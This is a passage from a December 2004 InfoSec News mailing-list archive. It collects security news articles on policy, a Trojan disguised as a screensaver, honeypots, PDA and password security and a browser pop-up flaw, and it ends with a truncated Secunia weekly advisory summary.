assistant secretary post at Homeland Security, and it urges the administration to consider tax breaks and other incentives for businesses that make computer security a top priority. The congressional report and the recommendations released by the technology industry group reflect growing frustration with the White House's commitment to implement its cyber-security strategy. A February 2003 report laid out the administration's vision for protecting key areas of the Internet from digital sabotage as part of a broader strategy for guarding vital U.S. assets. The House Homeland Security Committee and the Cyber Security Industry Alliance both want the department to match budget money to specific cyber-security programs and to take the lead on creating a disaster recovery and response plan should the United States suffer a debilitating digital attack. Both also want the White House to lean on the Senate to ratify the Council of Europe's cyber-crime treaty to help law enforcement bring more hackers and virus writers to justice and to dedicate more money to long-term cyber-security research and development programs. In addition, the administration should direct a federal agency to track costs associated with cyber-attacks, an effort that experts said will help drive a market for cyber-security risk insurance and help companies make a stronger business case for investments in computer security technologies. Lawrence C. Hale, deputy director of Homeland Security's National Cyber Security Division, defended the department's progress. He cited the development of a program to find and fix vulnerabilities in so-called "digital control systems," the technology used to manage systems such as the power grid and chemical manufacturing processes. Hale added that the department has been working to expand national emergency response plans to include cyber-security. He also said the department has been instrumental in helping federal agencies respond to and prevent computer attacks. "Do we have a long way to go? Certainly. But I would say that we're much better off than we were a year ago, and that both government and industry have made great strides," Hale said. Krebs is a staff writer for washingtonpost.com. Washingtonpost.com staff writer Robert MacMillan contributed to this story. From isn at c4i.org Wed Dec 8 02:58:41 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 8 03:15:20 2004 Subject: [ISN] Fake Lycos screensaver harbours Trojan Message-ID: http://www.theregister.co.uk/2004/12/07/fake_lycos_screensaver_trojan/ By John Leyden 7th December 2004 Virus writers have begun distributing their wares in emails that pose as Lycos's abandoned "Make love not spam" screensaver. The fake screensaver emails contain an attachment with a RAR SFX archive that has embedded key logger Trojan inside, antivirus firm Sophos warns. Infected emails come in emails with subject lines such as "Be the first to fight spam with Lycos screen" and an attachment called "Lycos screensaver to fight spam.zip". Upon successful installation, the key logging Trojan (Mdropper-IT) sends a message to an Indonesian email address confirming its status. The screensaver file, rather than displaying the Lycos screensaver, displays a blank screen. "Make Love Not Spam" was designed to bombard spam websites with requests, so increasing their bandwidth charges without - in theory - shutting them down. Security firms criticised Lycos's use of "vigilante tactics" especially when two of the targeted websites became unavailable. Several major internet backbone providers and ISP blocked access to Lycos' www.makelovenotspam.com website over concerns over its questionable legality. Lycos denied it was doing anything wrong, much less creating a DDoS attack platform, but it suspended screensaver downloads after spammers began redirected traffic back to makelovenotspam.com. This won't necessarily stop people falling for the VX ruse, unfortunately; fake Lycos screensavers will likely become a staple of social engineering tricks for weeks to come. From isn at c4i.org Wed Dec 8 02:59:08 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 8 03:15:22 2004 Subject: [ISN] Survey: Most EMEA countries unprepared for a disaster Message-ID: http://www.computerworld.com/securitytopics/security/recovery/story/0,10801,98098,00.html By Samantha Perry DECEMBER 07, 2004 Computerworld South Africa JOHANNESBURG - Veritas Software Corp. last week released the results of its third annual disaster recovery study which revealed, among other things, that 97% of businesses surveyed in EMEA (Europe, Middle East and Africa) would be unable to continue normal operations following a data center fire. The survey, conducted worldwide by UK-based Dynamic Markets, polled 1,259 IT professionals at companies with more than 500 employees. Of the EMEA IT managers surveyed, only 3% said they would be able to continue with business as usual after a data center fire. Thirty-eight percent had no idea how long it would take to resume bare bones operations, 31% could achieve bare bones service within 12 hours, and 38% didn't know how long it would take to get back to business as usual. In addition, 52% said that the only copy of their organization's disaster recovery plan was stored in the data center. According to the research, 16% of companies surveyed in EMEA don't have a disaster recovery plan in place. Thirty-four percent of these companies said they had not got around to it and 24% were in the process of putting a plan together. Another 24% felt they didn't need a DR plan, and of these, 19% say the company is too small to merit it, and 6% say that their board would not back such an initiative. Of those companies that do have DR plans in place, the majority don't review them often enough, resulting in plans that are falling behind in the face of rapidly changing technology. However, 92% of those companies with plans do actually review them: 13% do so monthly; 8% do so every three months; 14% every six months, 34% annually, 12% review on an ad hoc basis, and 9% review either less than every three years, never review, or do not know if they review. The figures for those companies that actually test their plans are much the same. Veritas vice president, marketing, EMEA, Chris Boorman said, "The issue of change control is an interesting one, particularly in light of the substantial increase in patches that we have been seeing lately, and spiraling concerns about viruses and accidental or malicious employee behavior." "While patch updates will rarely trigger the need for a change in DR strategy, IT departments should certainly be reviewing their DR plans more frequently than once a year," he concludes. From isn at c4i.org Wed Dec 8 02:59:26 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 8 03:15:23 2004 Subject: [ISN] Security 'Honey Pots' May Snare Private Details Message-ID: http://www.eweek.com/article2/0,1759,1737144,00.asp By Michael Myser December 7, 2004 Though some legal issues still surround "honey pots," their use within the security industry is fairly common and is considered a critical weapon in fighting malicious hackers and viruses. "They're an incredibly valuable tool," said Rich Mogull, research director at analyst firm Gartner Inc. of Stamford, Conn. "You can't really know what's happening without monitoring what's going on in the world. Honey pots and honey nets do a good job of this." Setting up an unprotected server or network invites attackers to infect or examine the system. The honey pots are then used to track the hackers and collect data on the way the intruders operate. Information collected in honey pots is typically used to power early warning and prediction systems. "It's not something every organization needs, but I expect all security vendors to do be doing something [like this]," Mogull said. "That's how you're going to find out what the new threats are, without compromising your real systems." IMlogic Inc. of Waltham, Mass., told eWEEK.com it would use IM honey pots to drive its Threat Center initiative, which will warn vendors of new spam and malware attacks. Though Gartner's Mogull wasn't at all surprised that IMlogic would employ this technique, legal issues still can arise from honey pots if security vendors and enterprises aren't careful. For one, enterprises could be found liable if hackers were to use honey pots as a launching pad to harm another entity. "If you've created a dangerous, open resource, you've created a tool for hackers to use," said Benjamin Wright, an attorney and instructor at the SANS Institute. "You need to avoid anything that encourages damage to a third party." One way to avoid that, he said, is to label the honey pot as off limits, or a resource that is private property, which outsiders are not authorized to use. Such labeling also would help ward off the common defense tactic of citing "entrapment" in the case of prosecution. "Entrapment is when somebody induces the criminal to do something he was not otherwise imposed to do," Wright said. He explained that it's a common misconception that organizations can be sued for entrapment, when in reality, it's used only to defend the accused and should not be a concern for enterprises. Lance Spitzner, founder of the nonprofit security organization Honeynet Project, agreed, saying that neither liability nor entrapment has been an issue, but that privacy is a concern. "From a privacy perspective, you need to consider what you capture, how you capture it, and what you use it for," Spitzner said. He said the main concern surrounds violating the federal Wiretap Act, which prohibits intercepting the content of communications. "Are you getting the conversations themselves?" he asked. "The more data you're pulling, the more potential privacy issues there are." If a firm is capturing transactional information such as IP addresses, or examining malware contained in the communications, there likely is little to be concerned about. IMlogic told eWEEK.com its honey pots would likely only receive spam or malware, so conversations wouldn't be an issue. But there are still no hard and fast answers to some of these legal concerns. "There is no absolute authority, because there are so many variables involved and no precedents," Spitzner said. The Honeynet Project recently published a book [1] on honey pots, which includes a chapter (here in PDF form) [2] on legal concerns by Richard Salgado of the Department of Justice. Security firm Sophos, based in the United Kingdom, isn't much concerned with the legal aspects of honey pots and is one of many vendors using various types to develop cyber-defenses. "We receive millions of spam messages into our traps from around the world," said Gregg Mastoras, senior security analyst at Sophos. "We take those messages, dissect them, try to understand them, where they're coming from, and build protection around it for our clients." Because it's a closed system?the spam and viruses the company receives don't get distributed from the Sophos system?and the company isn't building legal cases against spammers, there aren't legal implications for its spam traps. "Most of the security research companies use honey pots to get information on bad guys, malware, viruses and things like that," Honeynet's Spitzner said. "Honey pots are also becoming more commonly accepted, so they're being used for marketing purposes by security firms." "If you're going to develop products and services to defeat these, you've got to understand the basics of what they're delivering by actually getting some of them yourself," Sophos' Mastoras said. [1] http://www.amazon.com/exec/obidos/ASIN/0321166469/c4iorg [2] http://www.honeynet.org/book/Chp8.pdf From isn at c4i.org Thu Dec 9 03:14:36 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 9 03:28:24 2004 Subject: [ISN] Keeping sensitive info secure is a major concern with PDAs Message-ID: http://www.itbusiness.ca/index.asp?theaction=61&lid=1&sid=57610 By Lynn Greiner 12/8/2004 The most secure company probably has a gaping hole in its corporate pocket, which allows crucial data to slip out. Yes, the network is protected by a firewall, intrusion detection system and virus scanner. The PCs on that network are locked down. The wireless network is encrypted and secured. Data is properly backed up. All is mellow. Then the senior vice-president tucks his personal digital assistant (PDA) into his jacket pocket and heads out to the fitness club, where that jacket will be left unattended while he works out. Or the marketing manager grabs his cell phone and runs to a meeting, where he will leave the phone on the conference room table while he visits the washroom. What's protecting the data in those devices? In a study conducted earlier this year by the Graziadio School of Business and Management at Pepperdine University in Los Angeles, 81 per cent of respondents said they carry "somewhat valuable" or "extremely valuable" information on their PDAs. Sixty per cent of executive-level respondents said their business would be "somewhat" or "extremely" affected if the data on company-issued PDAs were lost. And 24 per cent have experienced loss or theft of at least one PDA. Devices become life repositories Despite this, half of the respondents did not have any security on their PDAs, beyond (perhaps) a power-on password. That blood-curdling scream you just heard is your security officer, who until now thought he had a handle on vulnerabilities. With any personal device, be it company-issued or employee owned, management is a major headache. It's as much a social problem as a technological one. Users treat their PDAs and cell phones as life repositories, storing business and non-business data cheek by jowl, and consider attempts to manage the devices as affronts to their privacy. Yet as long as there's a scrap of business data on the device . a phone number, a password, even a meeting reminder . the "private" device is very much the company's concern. Managing it, however, is easier said than done. It's easy to back up data on a PDA if it synchs to a company computer - just back up the files on the computer. The trick is in protecting it while it's out and about in the handheld. That mainly entails preventing the user from turning off any security on the unit. That's not all there is to management of mobile devices, however. There's asset management: controlling who has which device, operating system and so forth. There's configuration management: making sure that all applications are installed that should be, in their correct versions. There's encryption. If the machine has communications capabilities (802.11b, for example, or if it's a smart phone), there's network and virtual private network (VPN) configuration and security to worry about. Fortunately, there are both standalone products and modules for enterprise management suites that can handle the job. They can even program the handheld to erase all of its data after a predefined number of bad login attempts; a thief may get a free PDA, but company information will be protected. Unfortunately, these products can cost several hundred dollars per protected unit (for small license counts). Despite this heavy hit on the corporate wallet, IDC says that the market for mobile management products is expected to achieve a compound annual growth rate of 44.9 per cent through 2008, when it will be a whopping $US911.4 million. Tell the boss what's at risk Before you manage mobile devices, though, you have to find them. And if users have local administrator privileges on their PCs (generally a bad thing, by the way), it may be easier said than done. In that case, when users acquire their new mobile toys, they can just quietly install the synchronization software and merrily start pulling corporate financial spreadsheets onto their devices without anyone's knowledge. The first IT will hear about it is when the handheld hiccups and its owner comes for help, or a PC acts up and the responding tech notices the new software. Then, of course, the user will howl when told that he or she shouldn't be loading company information onto a personal device. It, after all, increases their productivity. And they're probably right, but convincing them that it also increases risk to the company is usually a losing battle. You might have better luck persuading them to enable power-on passwords, insisting they use encryption software for business information (for which the company will pay), and insisting that the device be locked when idle. You also need to make sure that the edict comes from the top. Chances are, the boss is one of the culprits. Convince him or her of the ri$k to the company, and guilt will do the rest. From isn at c4i.org Thu Dec 9 03:14:51 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 9 03:28:26 2004 Subject: [ISN] Air Force wants faster patching Message-ID: http://www.fcw.com/fcw/articles/2004/1206/web-airforce-12-08-04.asp By Frank Tiboni Dec. 8, 2004 Air Force officials will meet next week to discuss broadening their information assurance efforts to include speeding the service's software-patching process. Officials' ultimate goal is to have software patches implemented across the Air Force in minutes. During the next few months, they hope to cut the time from tens of days to just days, said Col. Ronnie Hawkins, director of communications operations in the Office of the Deputy Chief of Staff for Installation and Logistics. Hawkins spoke Dec. 7 at Air Force Information Technology Day, sponsored by AFCEA International. Air Force officials can deliver a software patch across the service in minutes, but it takes much longer to install them, Hawkins said. Although patches are distributed automatically, they often are put on computers manually, which can take months. Air Force chief information officer John Gilligan has described that delay as unacceptable. Air Force officials signed two Microsoft consolidation contracts worth $500 million last month during the next six years to streamline the service's software and support contracts with the company. The $70 million support portion allows for the automatic distribution and installation of Microsoft software patches. From isn at c4i.org Thu Dec 9 03:15:05 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 9 03:28:38 2004 Subject: [ISN] Browser phishing 'flaw' could hook users Message-ID: http://news.com.com/Browser+phishing+flaw+could+hook+users/2100-1002_3-5484315.html By Robert Lemos Staff Writer, CNET News.com December 8, 2004 A function built into all major browsers could be co-opted by attackers to fool Web site visitors into surrendering sensitive information, a security firm warned on Wednesday. The issue, which security firm Secunia labeled a flaw, could allow a malicious Web site to refer visitors to a legitimate site--such as a bank's Web site--and then control the content displayed in a pop-up windows. The issue affects Microsoft's Internet Explorer, the Mozilla Foundation's Mozilla and Firefox browsers, Opera's browser, the open-source Konqueror browser and Apple Computer's Safari, the firm stated in advisories on its site. "No browsers warn or check if the other site is allowed to change the content of the pop-up window," Thomas Kristensen, chief technology officer for Secunia, said in an e-mail to CNET News.com. "If the pop-up window is opened because the users clicked on a specific functionality, the user has no reason to suspect that the content in the window has been changed by a malicious site." The company has created demonstration that takes advantage of the flaw on its Web site. The example sends a user to Citibank's Web site, where clicking on the image opens a pop-up Window that is controlled by Secunia's program. Microsoft said that the attack uses a legitimate feature of browsers to fool users. "Our initial investigation has revealed that the report describes a by-design behavior in all popular web browsers that allows a website to open or re-use a window without displaying the address bar, which is a trust mechanism built into web browsers," the company said in a statement sent to CNET News.com. Apple, the Mozilla Foundation and Opera could not immediately be reached for comment on the issue. The hack of a legitimate feature is the latest security threat that could help phishers wrest identity information away from consumers. Last month, online intruders breached the security of at least one server at advertising host Falk and used the computer to distribute an attack to the service's clients, including The Register, a technology news and opinion site. Other flaws, together with mass e-mailing of links pointing to a malicious Web site, have been used to get aggressive advertising software, known as adware, installed on victim's computers. Microsoft stressed that Windows XP users who have installed Service Pack 2 have some anti-phishing tools. Any window that asks for log-in, financial or personal information should be encrypted and display a lock icon in the status bar at the bottom of the window, Microsoft said in a statement. "Some phishing cons have shown users a fake lock icon in a fake status bar at the bottom of the browser window," the statement said. "Internet Explorer in Windows XP SP2 will always show the real status bar so that users can detect a fake lock icon from a real one." However, Secunia said that the browser makers miss the point. Most users won't notice small details like that if they believe they are at a legitimate site. "The browser vendors fail to take into consideration the change of malicious activities on the Internet and the fact that security holes, which can be exploited to automatically install malicious code, isn't the only thing to be concerned about," Kristensen said. Secunia advised Web surfers to have only one Window open when you browse sensitive sites such as banks and Web stores. From isn at c4i.org Thu Dec 9 03:15:18 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 9 03:28:40 2004 Subject: [ISN] Severity of 127-day-old W2K flaw 'being determined' Message-ID: http://www.theage.com.au/news/Breaking/Severity-of-127dayold-W2K-flaw-being-determined/2004/12/08/1102182337247.html By Sam Varghese December 8, 2004 A longstanding security vulnerability in Windows 2000, deemed to be highly critical by the reputed security firm eEye Digital Security, is being investigated by Microsoft, the company says. The disclosure by eEye was made 127 days ago. A few days ago, Microsoft said it would not be releasing a fifth service pack for Windows 2000; rather it would issue an Update Rollup next year as a final security patch. Full details of the flaw found by eEye have not been revealed publicly but have been sent to Microsoft; what little detail has been provided publicly says it is "a remotely-exploitable vulnerability that allows anonymous attackers to compromise default installations of the affected software, without requiring user interaction, and gain absolute access to the host machine." Asked whether Microsoft would be patching this as a part of the final security patch for Windows 2000, a Microsoft spokesman indicated that the company was not yet sure whether the problem was severe or not. "Microsoft is investigating reports from eEye Digital Security of a possible vulnerability in Windows 2000 that could allow an attacker to compromise default installations of the affected software and gain access to a user's machine," the spokesman said. " Microsoft is currently unaware of active attacks against customers attempting to utilise this vulnerability, but is actively investigating the reports." eEye has found numerous serious flaws in various Windows versions in the past, including the vulnerabilities that resulted in attacks by worms like Sasser, Witty, and Code Red. The Microsoft spokesman said: "Upon completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a fix through our monthly release process or an out-of-cycle security update, depending on customer needs. "Security response requires a balance between time and testing, thus Microsoft will only release an update - when warranted - that is as well engineered and as thoroughly tested as possible - whether that is a day, week, month or longer. In security response, an incomplete security update can be worse than no patch at all if it only serves to alert malicious hackers to a new issue." Mainstream support for Windows 2000 will expire in June next year. A survey by the technology research firm Gartner in October found that around 60 percent of business users are still sticking with WIndows 2000. From isn at c4i.org Thu Dec 9 03:15:36 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 9 03:28:42 2004 Subject: [ISN] The Password PUZZLE Message-ID: http://www.dfw.com/mld/dfw/10366676.htm By Aman Batheja Star-Telegram Staff Writer Dec. 08, 2004 It's December, so Dorothy probably has "candycane" written on a piece of paper in her desk drawer. Last month, it was "turkey." Before that, "pumpkin." At work, Dorothy often chooses her computer password based on the next holiday on the calendar. She has to use several methods of creating passwords because she must change them so often. "You have to write them down, and I know I shouldn't," said Dorothy, a Fort Worth woman who asked that her last name not be used because, well, she just told everyone her password. "I have an entire sheet of passwords at my desk, which defeats the purpose of security." Whether it's the name of a child, a favorite sports team or a hot vacation spot, the constantly growing list of computer passwords needed to exist in a Web-addicted world is taxing people's patience -- and memory. Thanks to multiple e-mail accounts, online stores, online bill paying and network software, the plethora of passwords has some people on information overload. And it can only get worse this month as Internet shoppers log on to order those Christmas gifts. "We're making computer security too hard for the average user," said Steve Jones, founder of the Association of Internet Researchers. Most people end up using the same password for all their computer activities, Jones said. Or they don't change their passwords often enough. Or they choose passwords that are too obvious. All of those open the door to hackers. A survey conducted this year in London by Infosecurity Europe showed that the most common passwords were names of relatives, followed by sports teams and pets. A recent study at Southern Methodist University found that two-thirds of people's passwords are based on the users' personal characteristics, said Alan Brown, a psychology professor who conducted the study. Brown surveyed 218 students and found that about half based their passwords on proper names and birthdays, he said. Just 7.1 percent of the respondents used a password only once. The rest duplicated the same password for more than one application, some five or six times. "It was kind of disappointing," Brown said. "We confirmed what the suspicion was." That sloppy password conduct makes stealing credit card numbers and other personal information all too easy for hackers, experts say. "As far as security is concerned, passwords are probably the No. 1 problem," said Mike Stute, chief technology officer for Global DataGuard in Dallas. Unconcerned about threats Every month, the Windows XP Professional software on Nathan's computer asks him for a new password. Every month, he types in the same one. "Nobody's trying to rip me off," he said. That I'm-too-small-potatoes-for-a-hacker-to-care-about attitude is all too prominent, according to Rick Fleming of Digital Defense, a San Antonio-based network security firm. About 10 million Americans were victims of identity theft in 2003, according to the Federal Trade Commission. Many victims never figure out how their information was stolen. But information stolen from the Internet is likely to be used in the most prevalent crimes -- illegal credit card purchases and unauthorized checking account transfers -- according to a September study from Gartner Research, a company based in Bridgewater, N.J., that specializes in technology issues. "The biggest threat to security is people's lack of concern about it," said Fleming, a computer security veteran of more than 20 years. When people imagine computer hackers, they might think of Matthew Broderick in the 1983 movie WarGames. Broderick's character guesses the password to a classified military computer. But the typical hacker uses "brute force" -- password-cracking programs that can try up to 300,000 passwords a second. If the word is in the dictionary or is a proper name, a hacker can crack it in less than a minute, Fleming said. The programs are "in every language known to Earth and a few that aren't, like Klingon," Fleming said. Hackers don't necessarily mind if they can't find your credit card number. Sometimes, they just want to use your Internet connection to launch further attacks. And that could cause you problems with the authorities. "You are the one who could be held legally liable," Stute said. Some hackers want to use computers other than their own to send out spyware, which gathers and reports information about a computer user without the user's consent, or hackers may secretly install a file, such as the latest hit movie, and make it available for illegal download by others. "Then you've got this huge file there, and everyone's coming in and using your bandwidth access," Stute said. Getting creative Some people are more creative than others when choosing passwords. Mike, a Fort Worth computer security analyst, said he uses the name of his favorite mythical creature. Helle, a Scottish woman who was recently visiting friends in Fort Worth, uses the names of her favorite hotels in Las Vegas. Some turn their passwords into a wry joke. Liz, who works in a coffee shop in Fort Worth, makes a point to use ones such as "imbroke" and "gotnone" when signing on to sites where she pays her bill. "I think it's funny when I'm paying my student loans in small increments that my password is something like 'moneygone,' " she said. Janet, of Weatherford, uses her children's names and adds a number. The real trick to a secure password is making it seem like more of a random mix of characters, including numbers and symbols, Fleming said. That should increase the time it takes to crack a password. But, given enough time and resources, hackers can crack anything. That's why security experts stress the importance of changing your password often. But that brings the problem back full circle. "The more frequently you change your password [or] the more complex you make your password, the more likely you are to forget it," Fleming said. One way to remember a new, but effective, password is to pick a memorable phrase and make your password the first letter of each word. Another method is to insert symbols that resemble letters into an old password, such as turning "dallascowboys" into "da11a$c0wb0y$." Security advances Someday, passwords could go the way of the floppy disk and eight-track tapes. Researchers are working on more secure alternatives, such as systems that use visual passwords. Users are shown a series of pictures or abstract images and are asked to pick several that seem familiar to them. Those images become their password. To sign on, users pick their pictures from a group of random images. What makes a graphical password system so attractive is that it's difficult to tell anyone else your password or to write it down. Another avenue is biometric devices such as facial scanners. They make it impossible for anyone but the user to sign on to a given system. Microsoft founder Bill Gates has suggested that biometrics are the future of computer security, and Microsoft has introduced a keyboard with a fingerprint reader. "All the James Bond stuff we've seen over the years may someday be our reality," Fleming said. IN THE KNOW What makes a good password? * It should be at least six characters long with upper and lowercase letters, plus symbols and numbers if the site or program allows it. * Avoid names, birthdays, telephone numbers or Social Security numbers. * Devise an acronym using a nonsense phrase or a sequence you can remember, like a line from a song or the initials and ages of several friends. * Vary your passwords often. You should change them at least every two months for sites or programs containing sensitive information. SOURCES: Mike Stute of Global DataGuard in Dallas and Rick Fleming of Digital Defense, a San Antonio-based network security firm From isn at c4i.org Fri Dec 10 05:28:04 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 10 05:56:14 2004 Subject: [ISN] Secunia Weekly Summary - Issue: 2004-50 Message-ID: ======================================================================== The Secunia Weekly Advisory Summary 2004-12-02 - 2004-12-09 This week : 46 advisories ======================================================================== Table of Contents: 1.....................................................Word From Secunia 2....................................................This Week In Brief 3...............................This Weeks Top Ten Most Read Advisories 4.......................................Vulnerabilities Summary Listing 5.......................................Vulnerabilities Content Listing ======================================================================== 1) Word From Secunia: Monitor, Filter, and Manage Security Information - Filtering and Management of Secunia advisories - Overview, documentation, and detailed reports - Alerting via email and SMS Request Trial: https://ca.secunia.com/?f=s ======================================================================== 2) This Week in Brief: ADVISORIES: Secunia Research has reported a vulnerability, which affects most browsers. The vulnerability allows a malicious web site to "hi-jack" a trusted site's pop-up window. This could be exploited by phishers to convince people into disclosing confidential information, or to download and install malicious programs, which the user believes comes from a trusted web site. Secunia has constructed a test, which can be used to check if your browser is affected by this issue: http://secunia.com/multiple_browsers_window_injection_vulnerability_test/ Please refer to the test above, or the Secunia advisories below for additional details. References: http://secunia.com/SA13251/ http://secunia.com/SA13129/ http://secunia.com/SA13253/ http://secunia.com/SA13254/ http://secunia.com/SA13252/ http://secunia.com/SA13402/ -- Apple has issued a new Mac OS X Security Update, which fixes multiple vulnerabilities. An extensive round up of the vulnerabilities are available in the referenced Secunia advisory below. References: http://secunia.com/SA13362 VIRUS ALERTS: Secunia has not issued any virus alerts during the last week. ======================================================================== 3) This Weeks Top Ten Most Read Advisories: 1. [SA13129] Mozilla / Mozilla Firefox Window Injection Vulnerability 2. [SA13251] Microsoft Internet Explorer Window Injection Vulnerability 3. [SA12959] Internet Explorer HTML Elements Buffer Overflow Vulnerability 4. [SA13362] Mac OS X Security Update Fixes Multiple Vulnerabilities 5. [SA12889] Microsoft Internet Explorer Two Vulnerabilities 6. [SA13269] Winamp "IN_CDDA.dll" Buffer Overflow Vulnerability 7. [SA13252] Safari Window Injection Vulnerability 8. [SA13253] Opera Window Injection Vulnerability 9. [SA13402] Netscape Window Injection Vulnerability 10. [SA13254] Konqueror Window Injection Vulnerability ======================================================================== 4) Vulnerabilities Summary Listing Windows: [SA13391] GetRight "DUNZIP32.dll" Buffer Overflow Vulnerability [SA13365] Microsoft Browser Client Context Tool Three Vulnerabilities [SA13361] Kreed Format String and Denial of Service Vulnerabilities [SA13368] Battlefield 1942 / Battlefield Vietnam Denial of Service Vulnerability [SA13389] Remote Execute Multiple Connection Denial of Service Vulnerability [SA13372] Cisco CNS Network Registrar Denial of Service Vulnerabilities [SA13396] Microsoft Internet Explorer "sysimage:" Local File Detection Weakness UNIX/Linux: [SA13406] Red Hat update for ImageMagick [SA13395] SUSE Updates for Multiple Packages [SA13386] Mandrake update for ImageMagick [SA13382] Gentoo update for imlib [SA13381] Imlib Image Decoding Integer Overflow Vulnerabilities [SA13378] LessTif libXpm Multiple Image Processing Vulnerabilities [SA13373] Gentoo update for pdflib [SA13366] SUSE update for cyrus-imapd [SA13362] Mac OS X Security Update Fixes Multiple Vulnerabilities [SA13380] Debian update for ViewCVS [SA13367] Darwin Streaming Server "DESCRIBE" Request Denial of Service Vulnerability [SA13358] Big Medium Unspecified Script Upload Vulnerability [SA13401] Sun Solaris in.rwhod Unspecified Vulnerability [SA13371] Debian hpsockd Buffer Overflow Vulnerability [SA13359] Red Hat update for kernel [SA13407] Fedora update for mysql [SA13403] Debian update for nfs-utils [SA13390] Mandrake update for nfs-utils [SA13384] nfs-utils "SIGPIPE" TCP Connection Termination Denial of Service Vulnerability [SA13405] rootsh Escape Sequences Logging Security Bypass [SA13392] Gentoo mirrorselect Insecure Temporary File Creation Vulnerability [SA13388] Gentoo update for perl [SA13387] Mandrake update for gzip [SA13385] Mandrake update for lvm [SA13383] Mandrake update for openssl [SA13379] Gentoo rssh Arbitrary Command Execution Vulnerability [SA13376] file Unspecified ELF Header Parsing Vulnerability [SA13370] AIX Unspecified System Startup Scripts Vulnerability [SA13369] Gentoo update for scponly [SA13364] scponly Security Bypass Arbitrary Command Execution Vulnerability [SA13363] rssh Security Bypass Arbitrary Command Execution Vulnerability Other: Cross Platform: [SA13402] Netscape Window Injection Vulnerability [SA13400] WebLibs Directory Traversal Vulnerability [SA13375] ViewCVS Restricted Directory Access Security Bypass [SA13397] MaxDB Web Tools Buffer Overflow and Denial of Service Vulnerabilities [SA13393] Codestriker Unspecified Repository Security Bypass Issue [SA13360] Jakarta Lucene "results.jsp" Cross-Site Scripting Vulnerability [SA13357] Serendipity "searchTerm" Cross-Site Scripting Vulnerability [SA13377] Novell NetMail Default NMAP Authentication Credential Security Issue ======================================================================== 5) Vulnerabilities Content Listing Windows:-- [SA13391] GetRight "DUNZIP32.dll" Buffer Overflow Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-07 ATmaCA has reported a vulnerability in GetRight, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13391/ -- [SA13365] Microsoft Browser Client Context Tool Three Vulnerabilities Critical: Highly critical Where: From remote Impact: Cross Site Scripting, System access Released: 2004-12-07 Nicolas Gregoire has reported some vulnerabilities in Microsoft Browser Client Context Tool (W3Who.dll), which can be exploited by malicious people to conduct cross-site scripting attacks or potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13365/ -- [SA13361] Kreed Format String and Denial of Service Vulnerabilities Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2004-12-03 Luigi Auriemma has reported some vulnerabilities in Kreed, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13361/ -- [SA13368] Battlefield 1942 / Battlefield Vietnam Denial of Service Vulnerability Critical: Moderately critical Where: From remote Impact: DoS Released: 2004-12-07 Luigi Auriemma has reported a vulnerability in Battlefield 1942 and Battlefield Vietnam, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13368/ -- [SA13389] Remote Execute Multiple Connection Denial of Service Vulnerability Critical: Less critical Where: From local network Impact: DoS Released: 2004-12-07 Paul Craig has reported a vulnerability in Remote Execute, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13389/ -- [SA13372] Cisco CNS Network Registrar Denial of Service Vulnerabilities Critical: Less critical Where: From local network Impact: DoS Released: 2004-12-03 Qualys Security Research Team has reported two vulnerabilities in Cisco CNS Network Registrar, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13372/ -- [SA13396] Microsoft Internet Explorer "sysimage:" Local File Detection Weakness Critical: Not critical Where: From remote Impact: Exposure of system information Released: 2004-12-08 Gregory R. Panakkal has discovered a weakness in Internet Explorer, which can be exploited by malicious people to detect the presence of local files. Full Advisory: http://secunia.com/advisories/13396/ UNIX/Linux:-- [SA13406] Red Hat update for ImageMagick Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-09 Red Hat has issued an update for ImageMagick. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13406/ -- [SA13395] SUSE Updates for Multiple Packages Critical: Highly critical Where: From remote Impact: Privilege escalation, DoS, System access Released: 2004-12-08 SUSE has issued updates for multiple packages. These fix various vulnerabilities, which can be exploited to overwrite files, gain escalated privileges, or potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13395/ -- [SA13386] Mandrake update for ImageMagick Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-07 MandrakeSoft has issued an update for ImageMagick. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13386/ -- [SA13382] Gentoo update for imlib Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2004-12-07 Gentoo has issued an update for imlib. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13382/ -- [SA13381] Imlib Image Decoding Integer Overflow Vulnerabilities Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2004-12-07 Pavel Kankovsky has reported multiple vulnerabilities in imlib, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13381/ -- [SA13378] LessTif libXpm Multiple Image Processing Vulnerabilities Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2004-12-06 Multiple vulnerabilities have been reported in LessTif, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13378/ -- [SA13373] Gentoo update for pdflib Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2004-12-06 Gentoo has issued an update for pdflib. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system or cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13373/ -- [SA13366] SUSE update for cyrus-imapd Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-06 SUSE has issued 